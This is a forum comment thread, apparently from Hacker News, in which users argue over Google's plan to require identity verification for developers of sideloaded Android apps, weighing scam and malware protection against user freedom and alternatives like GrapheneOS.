"the argument that it's for our own good." is their insistence that we should accept this loss of our freedom to run the software we want because it protects us. It doesn't actually protect us though, so it isn't worth it and we shouldn't accept it.
My original statement had nothing to do with motorcycle helmets, but if using them required us to give up enough of our freedoms they could also become unacceptable for the level of protection they provide (or fail to provide) us.
> The requirement will go into effect in September 2026 for users in Brazil, Indonesia, Singapore, and Thailand. Google notes how these countries have been “specifically impacted by these forms of fraudulent app scams.” Verification will then apply globally from 2027 onwards.
At least most of the world has until 2027 to install LineageOS or GrapheneOS.
Apps are increasingly failing to run on grapheneos because Google is pushing for the play integrity verification. More and more apps, some critical like banking apps, some not at all, require your device to be running an official rom signed by Google.
So I will go back to carry two devices, I guess. Like when I had a Jolla Phone and an Android phone. Or before that with a Palm PDA and a dumbphone. It is convenient to have everything combined in a single device, but guess that turned out to be just a temporary luxury.
Great for you. What about the normies? You know, the people that protest and make things change: how are they going to organize themselves when their government gets authoritarian and Apple/Google obey the government's request to forbid some app? You know, like what happened during the Hong Kong protests with the Apple App Store.
I’m not saying I have a solution but looking at yourself and pretending it’s all fine because you’re 10 times more tech savvy than the average citizen isn’t a viable answer. That kind of issue must be solved by regulation, hopefully Europe gets to bring back on earth whoever at Google agreed on that idea.
It's not "all fine", but realistically it's the best that you can hope to achieve.
The "normies" won't protest because it mostly doesn't affect them, at least not in any direct and obvious way that would trigger a pushback.
Regulation is unlikely to give you what you want. For one thing, regulators love centralization in general because it makes it much easier to regulate - when there are only a few large players, you can write the laws around them, effectively forcing them to be the enforcers. A large and diverse field where users can install whatever apps from wherever is much harder to regulate wrt things like banning porn or violent games or whatever it is that "normies" feel upset and demand that SOMEONE DO SOMETHING ABOUT IT!!!1! today.
This isn't to say that you shouldn't try to use political tools. Just be very clear that what you're trying to achieve is a minority take, and therefore you're unlikely to actually reach the goal in a democracy; at best, you will move the needle very slightly.
So, if you want to actually enjoy freedom in the meantime, learn how to be a criminal.
So I guess now is the time to decide whether Pixel is actually something I would want to purchase from Google (and support the decision they just made with cash money) or... what exactly. I am not an Apple fan either.
So where do we complain? (Aside from shaming Google on social media or writing to politicians.)
If I look through Google's contact links, it's all oriented around getting help with a problem rather than letting them know I'm going to move to something else if they go through with this. (And yes, even if Apple has the same types of restrictions on app store, if a more open alternative OS didn't work out for me, I'd move to them to punish the one dropping freedom of use.)
I knew this was coming thanks to the nincompoop bankers and IMDA together with horny uncles who fall for love/job scams here in Singapore. The reason I use android over iOS is that I can load apps for personal automation. I think the current scenario where bank apps refuse to run on phones with sideloaded apps is far more acceptable. I'm not sure scammers will not find a way around this. I can still be able to pin web apps.
FWIW I'd rather not use my phone for critical transactions; it's making authorities lazy. The number of times I've had to fight thanks to "buggy" payment code that deducts money is not funny, and banks are getting worse at customer support day by day.
Also what the fuck are the governments doing with tax payer money, instead of going after criminals, we go after citizens.
If you think about it, the only thing that keeps this OS vendor in this duopolistic position is the fact that people rely on certain proprietary apps. We need ways to do things like messaging and banking in a universal way, just like we can do with email, calls, texts and web. Banking and messaging should be fully universal so we don't rely on specific apps only available on specific app stores. That would take all power away from these satanic US companies!!!
Taking the article at face value, they'll have to register with google and have their apps be signed. Presumably this is subject to less review than the play store (eg. you don't have to justify your permissions list or whatever[1]), but there's no guarantees that developers will bother with the hassle. A lot of developers are willing to put some release up on github, but not dox themselves to google.
The only silver lining I see is if it allows you to bypass this by enabling dev mode on your phone. If you can't sideload unverified apps even in dev mode, that would be insanely bad.
IF that is the case, I'm actually willing to be slightly inclined to see this as a positive? We should normalize installing apps outside of Google Play, but that means malware becomes a serious issue with people downloading and installing random APKs.
e.g., this may normalize people hosting downloadable APKs whilst also reducing malware risk for "normies", which idealistically could weaken the "monopoly" of Google Play on android.
This is crazy, this means 10 years from now only terrorists will distribute software. Unacceptable! How many platforms now allow one to build and distribute a binary?
Only Linux, BSD and other operating systems that are entirely Open Source.
Even Windows has scary warnings now that pop up unless you pay several hundred dollars a year plus you have to go through a completely unreasonable process (that often requires being shipped a physical USB device) just to sign your application.
If you maintain it as a hard fork, why not? New phones' technical specification improvements have been diminishing for the last few years anyway. As long as it works, it can last for many years to come. The question is only in the project budget, I think.
Time to move to a dumb phone, I guess. Android is slowly becoming the worst of both worlds, none of the privacy features of iOS yet the walls of the garden keep getting higher.
Hmm this is weird. I've recently been considering switching back to Android because of how locked down ios is and it sounds like Google's now gonna do the same thing? Will there be a way to deactivate this?
This was probably the reason Nokia died. Symbian development was already cumbersome, and app deployment required some such procedure. I remember there was a joint effort in a China-based forum and many of us got a cert and a key for our phones. I was reading Nokia obituaries from its executives and the sorry state of Symbian development and app deployment was not considered as a cause. So here it is, young executives repeating a simplistic and destructive strategy. IBM, Xerox, Nokia and Intel will be very proud.
The better alternative? Dunno. An alternative is iPhone and just take some of the benefits that comes with it. It's been a much more closed ecosystem from the start, but it's owned it. Google had a competitive advantage over that but they seem intent on throwing those advantages away with no foreseeable other upsides.
In development, working on completely other problem spaces to mobile development at all. It's not 2012 anymore and there are other noteworthy growth areas to spend time on.
But one thing in the short term was tonight I just spent some hours migrating registered accounts away using a Gmail account to Proton.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
There are APKs floating around from the Ice Cream Sundae days where the developer went out of business and is no longer on Play Store and this is literally the only way to run the app.
I have a Concept2 rower with the old PM3 monitor which is no longer supported by their ErgData app and the only way to connect my phone to my rower is by sideloading the ancient version of the app that supports it. So that's going to break now?
Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
>GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
Exactly, the only reason to be a weirdo and have android in the first place was because there's so many good apps available outside the play store, if they lock it down just like Apple then what's the point?
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
> iOS devices [..] have much less data collection than stock Android
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
> Why even run Android at that point anymore? iOS devices get security updates for longer and have much less data collection than stock Android.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
One of the reasons I switched to Android was the freedom to make apks for my phone and not dealing with certificates, expiry dates, Google's approval, etc.
This is a depressing change if they follow through with this.
And "in the name of security" doesn't pass the smell test if there is no way to opt out.
Well that sucks. So basically all the money we've had taken from us for our play store apps is now "just" going to be spent on administering the registration details of 800 million chinese developers and 6 billion bot accounts.
These companies need to be destroyed by antitrust violations. I am so tired of these tech companies abusing their market position. I want the FTC to stop being toothless and useless and just absolutely crush these companies. The amount of disdain I have for these companies can't even be properly expressed.
These companies are in bed with the government, you're not going to be saved by any legislation. Many people on this site supported Google censoring the Covid anti-vax idiots, but it should have made it very clear that Google was working at the behest of the government. They're in bed together; the government gets to do an end-run around the constitution, and Google gets to rely on special government privileges and protection. Win-win.
These corpos are part of the government, more or less, and they simply implement the edict to get rid of privacy. Not only in America. Smartphones have become eyes of the govs, while the Internet - something akin to their neural system. What's more interesting is why the govs feel so paranoid and insecure recently? What are they afraid of?
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
It's also worth reading Stallman's "Right to Read" again, to see how scarily prescient he was.
Before quickly running to dismiss this move, please at least do your research with regards to the situation in the countries mentioned in the article, especially Singapore and Thailand.
Side-loaded malware has been an epidemic in SE Asia, and there are MILLIONS of dollars stolen (mostly from pensioners!) via side-loaded malware disguised as gambling apps - the local population is particularly susceptible to gambling, especially the older generations that are not so tech-savvy.
So make it an unlockable feature with a big red warning saying something like: 'If you unlock this feature, your money might be stolen, malware could infiltrate your system. You take full responsibility and acknowledge that you are tech-savvy.'
I'm sure if my grandma saw something like that, she wouldn't click it. This way, people who want to stay in a closed garden are protected, while those who want full control have it. The current implementation seems designed for state interests, not the people's.
It shouldn't be impossible. Not every FOSS developer will want to register, or be mature enough, or may be from sanctioned countries, and so forth.
Private app companies should be and are doing more to protect against malware.
Banking apps in Malaysia are required to include malware detection software [0]. Companies should have better fraud and trust teams to identify and block fraud activities.
The rest of the world shouldn't suffer because a handful of banking companies refuse to offer basic fraud protections for their users.
The requirement per Google's post is rolling out globally though in a couple years. There was nothing stopping per country governments that this may disproportionately affect from requiring this for Play Protect/GMS certified Android devices sold in their region but enforcing it worldwide for such non-AOSP devices I don't find surprising to be controversial.
Brave of you to say this. Yeah, in my humble opinion, agree with you, android and ios devices target the mainstream users more than, say, a PC or Mac, and should be more locked down. We can keep PCs and Macs relatively open (although they are getting more secure too, which might be good?), but for devices that truly target the masses, secure them as much as possible (why would typical users like my parents need to install a remote access server on their phone?).
Yeah, my Dad got hacked only a month ago, through a tech-support phishing phone-call. He uses a windows PC which makes him vulnerable, and the scammers did install tons of evil crap. He really should be using an android or ios tablet, to reduce his chances of being hacked like this. I know these devices are still vulnerable, but they do seem more secure based on how much more locked down they are.
Android is getting more closed and iOS more open, I expect more people dissatisfied from both camps. We’ll have less choice overall as they gravitate towards a common middle ground.
Never heard of DUNS. It seems to be a US company (Dun & Bradstreet) that provides business intelligence.
It seems kind of odd to me to rely on some kind of external hidden "credit agency"-style company for this? And why would DUNS want to know about some kid in their basement in Bangladesh making (non-malicious) apps, and why would the kid want Dun & Bradstreet to know about them? It makes no sense at all.
They're trying to control malware. Tying apps that may be malicious to an identity that takes some degree of cost and effort to establish seems sensible in that light.
It's not that the identity prevents malware/abuse, but publishing any malware to the store burns the identity and establishing another is harder than simply coming up with a new email address. It's not necessarily the best scheme out of there, but it makes sense given their apparent goal.
Yeah, basically this is the rise of computer-credit agencies.
You can see the zeitgeist forming around corporations wanting to lock out any small unlicensed company from working on phones.
The key is mostly fascism in the guise of "security". Witness stuff like the ICE tracker app. Google would love a way to freeze out both its appearance on the app store and any developer who'd program similar.
FWIW I got a DUNS number through apple as a single developer for a corp. It was super easy. If you've already gone through the trouble of setting up a corp, getting the DUNS is trivial by comparison.
Yes. You gotta pay your 100 bucks, but I don't remember feeling like my privacy was being invaded when getting a developer account. I assume the best reason they have for this is that they can nuke the account, effectively killing the install base of an app that is reported to be malicious. Unless someone tells me why I should, I don't have a huge issue with this.
For me the difference is that Android is an open-source operating system. It sold itself and differentiated itself to users, developers and phone manufacturers as an open ecosystem built on open-source foundations.
Over the years, it seems Google has been trying to have their cake and eat it too, by basically subsuming others to use Android through this appeal of a more free and open operating system ecosystem, but have tried to slowly close and close it down now that it has won the other half of the market on that promise.
This feels more sly, because it's kind of a bait and switch. Apple never made such a claim and was always upfront, so while I don't like it, I never bought into it in the first place for them to have the rug pulled out from under me after giving them my money as Google might be doing.
Most Android apps are crapware anyways. The only respectful apps that I know are open-source, and are being kicked out of the Play Store progressively.
I saw this coming a mile away. Everyone said you could install whatever you wanted on Android, but you were always jumping through some crazy hoops to do so. (compared to a general purpose computer)
This would affect a lot of apps that are not on the Play Store for multiple reasons... and if I'm going to be stuck with what Google thinks I should be allowed to use, then why not use iOS instead? At least software updates would be better and the overall experience more polished.
"A recent analysis by the company found that there are “over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.”
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
Apple and Google are now competing on being more closed, rather than on being more open. Perhaps because we gave Apple a free pass on curbing our freedoms, and even defended its actions as needed for 'security'
He was unable to suggest any pragmatic alternatives. He just said "I don't own a smartphone", ignoring the fact that many people become very disadvantaged without one.
The real heroes are the people that facilitate alternatives, not those who talk.
Stallman is probably in the top 10 of all time in terms of people who facilitated alternatives to this. He invented the GPL and wrote and maintained a ton of tools for people running alternative software stacks to use. What more would you ask for?
> I know quite some people who live this way, and are very willing to overcome inconvenient hurdles to avoid having to use such a spying device.
This is kind of a lazy approach, and it's a good thing Stallman did not have that attitude towards personal computers.
But it's a bummer that there's no real equivalent for mobile devices. I use an Android device and I already consider it to be more locked down than Windows. Generally more irritating than Windows as well (maybe not Windows 11)
I also use it as little as possible (unfortunately more and more things require it) and try to get the smallest functional (for me) Android devices.
There are alternatives, using them involves sacrifices though, and there the modem baseband isn't replaceable yet. Take a look at GrapheneOS, F-Droid, Replicant, Purism Librem, PinePhone, PostmarketOS, PureOS, Mobian etc.
Okay, let's say you just became an enlightened person who understands that the current state of things needs to be fixed.
To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
The speakers of the world have their place, of course, but that's not the most important part of the solution.
> To actually free yourself requires both commitment on your end and work on other people's end, those people who help facilitate alternatives and guide others to having more freedom and privacy. We need more of that work.
Such people both lead by example, and try to inspire others towards following their example/lifestyle. The problem rather is that most people want a different lifestyle (in the particular example of privacy and freedom "one with less radical consequences", which I consider to be rather contradictory, but this discussion shall be off topic).
To give an analogue: many vegetarians both lead by example, and inspire others to become vegetarians. But many people nevertheless don't want to become vegetarians.
When I switched from Android to iOS, this was one of the things I missed a lot: the ability to write my own app and side load it on my phone. Even more so with the advent of LLM. Oh well, now I don't have to worry about that.
Governments are scurred the internet has made everyone realize their governments are crap, their history is gibberish, and it's all being used to screw the next generation. So 60+ year olds are falling back on old tropes
TikTok is "brain rot" even though the real economy runs on physical statistics, the semantics have to be recognizable to the elders, or it's not democratic so they will force the semantics to be regurgitated as-if they are religious catechism.
The Internet is the most powerful propaganda distributing system that humanity has ever come up with. Autocracies love the Internet, or at least the ones that see the writing on the wall. We have the sum total knowledge of the entire human race within a few clicks and we mostly use it to find videos to be mad at. We are our own jailors.
It's easy. For the average user, device integrity is more valuable (by a lot) than side loading.
People that think this is unacceptable are not remotely average users. Average users benefit greatly from their pocket appliance not being a full fledged computer.
Ultimate control over devices you own should be a basic right. Apple's wanton abuse of users and developers via the control they have over their platform, and Google's nipping at their heels, should be evidence enough of that.
Fundamentally, it is a trust issue. Why should I be forced to trust that Google or Apple has my best interests in mind (they don't)? That is not ensuring 'device integrity', it's ensuring that I am at the whims of a corporation which doesn't care about me and will leverage what it can to extract as much blood as it can from me. You can ensure 'device integrity' without putting any permanent trust in Google or Apple.
That was intended to be a generic 'device manufacturer', not calling out Google and Apple specifically. It's my device. I should control it, full stop. It should simply not be legal for a device manufacturer to lock me out of a device I own, post sale. In the past it wasn't _possible_, so we didn't need to worry about it. But now the tech is at the point where manufacturers can create digital locks which simply cannot be broken, and give them full control of devices they sell (ie. which they no longer own), which are being used in anti-consumer ways.
Considering market forces are against it, I believe the only practical way to accomplish this in the long term is for this to be a right that is enforced by legislation. I don't think it is even far from precedent surrounding first sale doctrine and things like Magnuson-Moss, that the user should be the ultimate one in control post-purchase, it just takes a different shape when we're talking about computing technology.
You are forced to trust Google or Apple if you want a smartphone. They own the whole market, it's a duopoly. You already have no power to install an OS without such limitations on most smartphones.
Limitations because it's not just protection - you don't get to choose which authorities you trust. Defaulting to manufacturer/OS vendor as the default authority would be ok, but there is no option to choose. Users have no power over their own device. That's not ok even if most choose to never execute it or don't know about it, it will lead to abuse of power.
Modern life without either of these OS (or like a phone number) is pretty difficult, i.e. you can't charge your car or access e-government without an app.
why do you think you have any say over others' rights? using that same logic, you know what? i think you're going to steal my phone. so do you mind if i sacrifice your rights and install a camera right in your room? wouldn't want you to plot the theft of my phone now would i
I'd argue that the average user is not a good barometer. They are okay with slowly being boiled alive. See Windows 11 as a good example.
What's being sacrificed in the name of security is not worth it imo.
Enabling side loading on android is not a standard setting you can flick on. Is there any data on the number of devices who have this enabled and are falling for hacked apps?
I might partially agree, but the market already has a fantastic, secure option for those users: Apple.
Android's value was always in being the open(ish) alternative. When we lose that choice and the whole world adopts one philosophy, the ecosystem becomes brittle.
We saw this with the Bell monopoly, which held up telephone innovation for three quarters of a century.
In the short term, some users are safer. In the medium term, all users suffer from the lack of competition and innovation that a duopoly of walled gardens will create.
They're happy in their walled garden, until they aren't and discover there is a wall they now can't overcome and learn whose hardware it really is
I do think it is in everyone's interest to be able to run software of your choosing on hardware you bought to own. The manufacturer needn't make it easy (my microwave sure didn't expect to install extra software packages; I don't expect them to open up an interface for this) but they also don't need to actively block the device owner from doing it
Bro, you forbade exactly the reason this is good for average users. Average users get emails that say:
> you have been infected by 3 viruses, click here in the next 5 minutes or the damage will be permanent
And they believe it. Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
I'm deeply concerned about how this will impact users like us, especially since we're such a small minority that our desires could easily be trampled by the masses, but this is a clear win for the average user.
(And don't make the perfectionist fallacy w.r.t. Google not successfully preventing 100% of malware)
In the short term, yes. In the long term, it means Google can ban any app it doesn't like, and it means governments can compel it to do so.
Governments being able to ban software without easy workarounds could have far-reaching consequences affecting people who don't even use the software in question. This is a Bad Thing even if it helps keep a few people from getting scammed.
Damn we should just give up on this whole computer thing outright then, seems pretty dangerous. There are plenty of other things we could strip away that would make people much safer than just installing software, that's thinking small!
Stripping away computers entirely would have significant negative impacts. For the *average user*, preventing them from side-loading unsigned apps will have no negative impact.
For now, maybe. Like all discussions on freedoms and rights it's usually not about the day to day impact or the average person, if we optimized for the average person, we'd be in a sorry state.
Two reasons: they are not educated about devices they use, desktop operating systems are still awful at security (exe from a mail attachment can have a pdf looking thumbnail, executed with two clicks, even if accidental, immediately gets access to all user files... the whole concept of antivirus software...). It has nothing to do with side loading, especially on Android, where sideloading is a very explicit action already, and then you need to allow the application to do harm.
> Giving them the power to run any software they want, also means giving everyone else the power to make them run any software they can be tricked into installing.
You are taking away people's agency. Either you get to control your bank account risking that you get scammed, or someone will control it for you.
> very explicit action already, and then you need to allow the application to do harm.
So the email they get which tells them about the 3 viruses also contains a phone number where a "nice tech support person" will walk them through the steps of side-loading the "anti-virus app". You'd be surprised at what warnings/permission boxes people will blindly accept when they think they're talking to someone from Microsoft or Google's tech support.
> You are taking away people's agency.
Agency they don't want and never use. It's taking away agency from people like us but for the average user, Google is taking away nothing they've ever cared about.
> Either you get to control your bank account risking that you get scammed, or someone will control it for you.
I was just saying a couple of days ago that we need a service for old people where any transaction above a certain configurable threshold (for example, $500 in a day) has to be approved by an employee of this service who serves as a neutral 3rd party whose sole function is to try to prevent scams. That way the old folks would still have their agency so they can go out and buy all the hot-rods and transistor radios they want but if they're about to wire money to "Microsoft" then the anti-scam-company would step in and prevent that transaction (or at least require the old person have a discussion about why it's an obvious scam first before eventually allowing the transaction through depending on the client).
Whether this change actually takes control away from us remains to be seen. For example, I don't see anything in the article that suggests we wouldn't be able to install a custom ROM with the signature check removed. Personally, I already run GrapheneOS so I expect I actually won't be impacted by this at all.
Agreed. Most people don't care that they can't run "unauthorized app XYZ", as long as their bank account / vacation pics / texts don't leak.
Now, that may happen anyway, but they'll give up a TON to avoid that.
Me, I try to avoid using my phone for anything important, use a VPN under Linux at home whenever possible, ad blockers, privacy guard, etc, etc. I can't expect my non-technical family members to do that.
Bad car analogy coming up: MOST drivers benefit more from ABS than the few really, really good race car drivers who can do threshold braking and outbrake ABS - and even then, I doubt it's true for anything but the earliest ABS systems. I'll bet the newest ABS systems are better than almost any human - because they don't have an off day, don't get distracted, etc.
And I get the anger - I'm an old school Atari 800xl / ST / DOS / Linux user who tries to ditch Windows where possible. Restricting things seems heavy-handed - and I don't trust Google in the least. But I would NEVER tell anyone in my family to sideload an app, even though they're all Android users - I don't want that support burden.
And people who are financially interested in letting users side-load apps (malicious or otherwise) are good at what they do. I mean, even Russian banks that are banned from the Apple App Store are still finding ways to distribute iPhone apps.
> Average users benefit greatly from their pocket appliance not being a full fledged computer.
Why, though?
There's certainly no technical reason that a pocket appliance can't be a full fledged computer. The primary reason it isn't is because device manufacturers benefit greatly from having a tight control over their products. This is not unique to mobile devices; we see the same trend of desktop operating systems becoming increasingly user hostile as well.
The claim that these features are in the best interest of users is an inane excuse. Operating systems can certainly give users the freedom to use their devices to their full capabilities, without sacrificing their security or privacy. There are many ways that Google could implement this that don't involve being the global authority over which apps users are allowed to install. But, of course, they are in the advertising business, where all data that can be collected, must be collected.
Don't pretend that average users are asked, or that their opinions would matter. Or even that you have some sort of insight into the average user that other people don't have.
People who think this is unacceptable are the people who 1) understand what it is, 2) don't stand to profit from it, and 3) don't dream about locking average users into an ecosystem that they control some day.
This seems like the only sensible long-term solution to me unless anyone else has an alternative. AOSP public access is already on the chopping block, custom ROMs are the short term solution but still operate at Google's whim under the hood.
It seems that it was only about time… it just feels like the pace of enshittification with big tech being able to get away with anything is crazy!
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such a mountain of complexity that it seems like only a billion/trillion dollar big tech company can make an OS.
But then again, somebody called BS on browsers and we might have a good option soon in Ladybug!
I rely on an open source app called xDrip to manage my diabetes. It's way way way better than any of the official apps. It's not distributed on the app stores for obvious reasons. Many others rely on this app as well. Are we cooked?
China will push own Android OS forks into other markets even harder, if they do it fully open-source then bonus for them, users will force devs (banking apps etc) to get more support. A good example is one EU bank which publishes to Huawei's AppGallery to support non-Google certified Android phones.
making an ADB-based debloater and browser shims to use stuff like bank apps, then sharing that with others. Then again, like cutting wires, it doesn't address the root cause.
"Google to prevent users from installing programs on Android phones."
This might do more good than harm, since I'm willing to believe that scams involving APKs are prevalent, but come on. I need your permission to install software on my phone? Are you sure it isn't just that you want more control over everyone's phones?
Everybody complaining of this is admitting they are doing nefarious actions. Those of us playing by the rules see no issue with this - In fact I welcome it!
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
"Distribute on" sounds odd because it's incorrect. APKs are not distributed by putting them on phones and carrying the phones from one place to another. "Distribute to" would be more correct; better yet, "develop for".
This is another "beginning of the end." All eyes are on this situation and how much push back it gets. If there is little resistance, others will certainly follow suit.
Another instalment of HN thread where people try their best to pretend that "security" does not come with "enforced, ideally at hardware level, inability to run random code" for 99% of phone users.
Here's a tip: you won't solve the problem of security by just whining about corporate interests (which is a real concern) and NOT proposing a better solution that works for an average tech illiterate, very socially engineerable person trained to ignore every warning screen. And no, a root switch is not that solution because it will be flipped on day 1.
> Google is explicit today about how “developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer.”
« Developers will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately Apple’s iOS is in competition solely with Android.
If Android gets so bad it has all the disadvantages of iOS, some more, for instance with the embedded spyware that manufacturers are paid to include, and none of the good side of iOS, then everyone loses. Apple doesn’t have to compete anymore, they just have to not suck.
Without an Apple ID you can compile an iOS app, but can only run it in an iPhone Simulator on a Mac.
With a free Apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
Is it really different from what Google is doing? Not being able to compile or the user not being able to install have the very same consequence: your app can’t be used.
This will be just another boost for de-googled phones, alternative platforms and potentially Mobile Linux.
The only reason why google phones became so popular was the fact that they were much less restrictive than iPhones. Thus the platform became the biggest phone platform in the world.
Now they are asking for a new start to arise and take their place.
Sorry, folks, the good times are over. The future of computing is a signed, attested chain of trust from boot firmware through application code, on all platforms people are likely to use -- and remote attestation with user identification if you wish to connect to the network. End users love it because it prevents or reduces all sorts of malicious activity, from bank fraud down to online game cheating, with little to no effort on their part; platform vendors love it because it provides a moat; service providers (banks and such) love it for the assurance that their clients are uncompromised; and governments love it because it lets them surveil users and developers.
The only ones who hate it are devs. And who really cares about a bunch of nerds?
Remember, general purpose computing really boils down in security terms to "arbitrary code execution" -- a bad thing in the infosec field.
If this goes through, would it be possible to see a consumer class-action lawsuit? I imagine there is a class of people for whom the sideloading of apps is necessary and removing it renders their phone almost useless. I'd also guess that this market is much larger than Google imagines.
Personally, if I'm not allowed to run the software that I want on my phone, it almost makes more sense for me to get some old flip phone or one of those Chinese BlackBerry knockoffs ca. 2012. Not out of any principled stance, mind you, it's just that's the level of functionality you'd be reducing me to. Why should I pay $500 when I can find something that gives me the same features on a literal junk pile?
It is. Notarization like Apple does is also legal. In fact the EU commission would welcome this with open arms since they can now access the personal data of every developer and can order Google to ban every app they want. This goes hand-in-hand with their new "Digital wallet" app that will be launched next year.
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
This has the potential to be disastrous for Google, but maybe not.
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reasons to keep using Android.
I suspect this won't be disastrous for Google, because where will people who care about this go? Apple, who is even more restrictive? This is just another in a long series of incidents showing why we desperately need a real alternative to the mobile duopoly. I would ditch Android over this, but there's no realistic alternative available to me.
I think the only thing that can save us is a jailbreak. Either for iOS or Android to let you sideload apps.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
Android also allows apps that can run arbitrary code, like emulators and various other runtimes. I think iOS still doesn't? I have not written an Android app in ages, other than at work, but I often write silly little things running in the Löve 2D Loader, or TIC-80, or DOSBox, or just command-line tools running in Termux (I hear there is an X-server as well to run GUI applications from Termux?).
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
They recently allowed emulators, like RetroArch, to be on the app store. They still require the emulators to be written in Swift AFAIK. Still quite a bit more restrictive than Android, but they have slowly been opening up.
This phase from the last couple of years just had to come - and while it's painful to be exposed to it - it seems highly illogical for us to complain and cry about it.
- "Free" search - yay, let's all use it for everything and even make a verb out of it
- Email - such nice guys, Google - free email forever, what could go wrong if I have 95% of all my info there
- Maps - yeah, let's all depend on these free Google maps with our lives
- Chrome - ofc, heck yes, let's all use their browser, it's the best and free - no need for anything else
- Google account login for EVERYTHING - so convenient! Google Authenticator app, Google Wallet - yes, more!
- Free mobile operating system - nice, take that, Apple!
Google has taken over a large portion of our lives, step by step - good enough services, on global scale, for free, until they became essential.
They are not evil, like they were never good - they are a company, and in the current socio-economic structure, that means having a duty to use their position to enrich their shareholders - and absolutely have no interest in people's wellbeing or morality or opinions or reputation - unless it temporarily serves to do so more / better.
I'm in no way trying to defend them. Just, with all the futility of it, pointing out how the hyper-capitalism we've built/allowed to grow has reached the stage where it's practically impossible for the "free market" to react / provide solutions that people want. Now the big players decide what people get.
In this case, you can no longer have a high quality phone from a good manufacturer and install on it what you want. Small manufacturers catering to that demographic won't get government certification, you can't have your e.g. Samsung and install a ROM anymore, and you can't install your app freely on Android unless Google lets you. That's all just in a tiny sliver of space.
Our Tetris board barely has any room left for choice and actions.
Dick move. Go back to "do no evil" big G. Remember how you used to be the kool kid on the block? Now you've just become the grown up you showed contempt for in your prime time.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
I don't understand, when the EU announced that Apple's "actually we need to sign all of these and pay us" requirement is illegal, Google was like "hold my beer"?
Could someone explain why the personal privacy of software developers is more important than the cybersecurity of consumers and nations please and thank you
Google is really turning into a dystopian company, destroying any goodwill their virtuous employees created in the past. It feels like they are primed to be the main turnkey tyranny facilitators.
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
